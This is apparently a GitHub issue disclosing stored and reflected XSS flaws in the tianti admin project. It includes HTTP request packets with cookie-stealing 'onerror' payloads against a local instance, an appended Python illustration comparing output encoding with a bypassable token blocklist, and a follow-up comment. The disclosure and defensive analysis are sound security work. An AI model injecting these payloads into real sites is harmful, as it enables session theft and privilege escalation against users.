
There are some XSS flaws in your project

Open · zsdlove opened this issue 6 years ago · 1 comment

Hello guys, I'm sorry to tell you that your project has so many XSS flaws.

First of all, the user list module has a stored XSS, which can lead to cookie disclosure and privilege escalation. The following picture is the proof of this flaw: [image]

Packet:

```http
POST /tianti-module-admin/user/ajax/save_role HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 329
Accept: */*
Origin: http://127.0.0.1:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/role_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

id=2c9025ab5a6f2b85015a6f2cef950000&name=%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86%E5%91%98%22%3E%3Cimg+src%3Di+onerror%3Dalert(document.cookie)&description=%E5%8F%AF%E4%BB%A5%E5%88%86%E9%85%8D%E5%90%8E%E5%8F%B0%E7%94%A8%E6%88%B7&rescoureIds=70&rescoureIds=71&rescoureIds=72&rescoureIds=73&rescoureIds=2c9025ab5adb1eef015adb2e74b90000
```

Payload: `"><img src=i onerror=alert(1)>`. The following is a description of this flaw based on the code. [image]

The path of this piece of code is: `tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp`.

`user_list.jsp` receives the value from the controller and displays it without any defensive measures.

Here is the `UserController`, where the request parameters from the user are read:

[image]

It puts the user info into the `User` object. This object is returned to the view via an AJAX call. As we can see, there are no defensive measures at all. [image]

Secondly, in the article management module there is also a stored XSS.
The following picture is the proof of this flaw:

[image]

And the following is the entry point of the flaw:

[image]

Thirdly, in the user management module there is a reflected XSS.

This functional module is for looking up user info by a keyword that the user enters. [image]

Packet:

```http
POST /tianti-module-admin/user/list HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 68
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:8080/tianti-module-admin/user/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb
Connection: close

userName=%22%3E%3Cimg+src%3Di+onerror%3Dalert%281%29%3E&currentPage=
```

Payload: `"><img src=i onerror=alert(document.cookie)>`

Advice: you can create a global interceptor to intercept user requests and check whether they contain potential threats, and you should also create another global interceptor to intercept the response and replace special characters with their entity forms. I hope you fix the flaws quickly. If you have any questions, please contact me at the following e-mail address: [email protected]

zsdlove · Nov 07 '18 13:11
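A worked illustration of the two sinks described in the report above, added here by the editor; it is not part of the issue and not tianti's code. It renders the quoted payloads into a constructed attribute-context sink (the `userName` search field echoed back by `/user/list`) and a constructed text-context sink (a name shown in a table cell), once verbatim as the report says `user_list.jsp` does and once with HTML entity encoding, then parses the result the way a browser would and lists which tags and event handlers survive. It also contrasts the reporter's first suggestion, a request-side check, with output encoding: a constructed token blocklist catches the quoted `onerror` payload but misses a trivially different one, while entity encoding at the output neutralises both. The two templates, the blocklist and the `<svg onload>` variant are assumptions made for the example. In the JSP itself the equivalent fix is to write values with JSTL's `<c:out>`, which escapes XML by default, instead of a raw `${...}` expression.

```python
"""Added example (not tianti's code): output encoding vs. a request-side blocklist
for the two XSS sinks described in the issue. Templates, blocklist and the svg
variant are constructed for illustration."""
import html
from html.parser import HTMLParser

# Payloads exactly as quoted in the issue.
STORED_PAYLOAD = '"><img src=i onerror=alert(document.cookie)>'
REFLECTED_PAYLOAD = '"><img src=i onerror=alert(1)>'
# Constructed variant that a token blocklist for "<script"/"onerror=" does not catch.
BLOCKLIST_BYPASS = '"><svg onload=alert(1)>'

# Constructed sinks modelling the report: the userName keyword echoed back into
# an attribute value, and a role/user name written into table-cell text.
ATTR_TEMPLATE = '<input type="text" name="userName" value="{{value}}">'
TEXT_TEMPLATE = '<td>{{value}}</td>'


class TagCollector(HTMLParser):
    """Records every start tag and every on* attribute a browser would act on."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def parse_markup(markup):
    """Return (start tags, event-handler attribute names) found in markup."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


def render(template, value, encode):
    """encode=False mirrors the JSP writing the controller value straight into
    the page; encode=True applies HTML entity encoding (what <c:out> does)."""
    if encode:
        value = html.escape(value, quote=True)
    return template.replace("{{value}}", value)


def injected_markup(template, value, encode):
    """Return (tags, handlers) that the value adds beyond the template's own."""
    base_tags, _ = parse_markup(template.replace("{{value}}", ""))
    tags, handlers = parse_markup(render(template, value, encode))
    return [t for t in tags if t not in base_tags], handlers


def naive_request_filter_blocks(value):
    """A request interceptor that rejects a few well-known tokens (constructed,
    to show why blocklisting on the way in is not a substitute for encoding)."""
    lowered = value.lower()
    return any(token in lowered for token in ("<script", "onerror=", "javascript:"))


if __name__ == "__main__":
    cases = (
        ("reflected: /user/list userName", ATTR_TEMPLATE, REFLECTED_PAYLOAD),
        ("stored: role/user name in a cell", TEXT_TEMPLATE, STORED_PAYLOAD),
        ("blocklist bypass", ATTR_TEMPLATE, BLOCKLIST_BYPASS),
    )
    for label, template, payload in cases:
        print(label)
        print("  blocked by naive request filter:", naive_request_filter_blocks(payload))
        print("  raw     ->", injected_markup(template, payload, encode=False))
        print("  encoded ->", injected_markup(template, payload, encode=True))
```

`html.escape` is correct for HTML text content and for quoted attribute values, which are the two contexts the report shows; a value dropped into an unquoted attribute, a `<script>` block or a URL needs the encoding for that context instead, so the response-side replacement the reporter suggests has to know where in the page each value lands.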

Any updates on this issue ?

Ofirnir123 · Jul 02 '19 08:07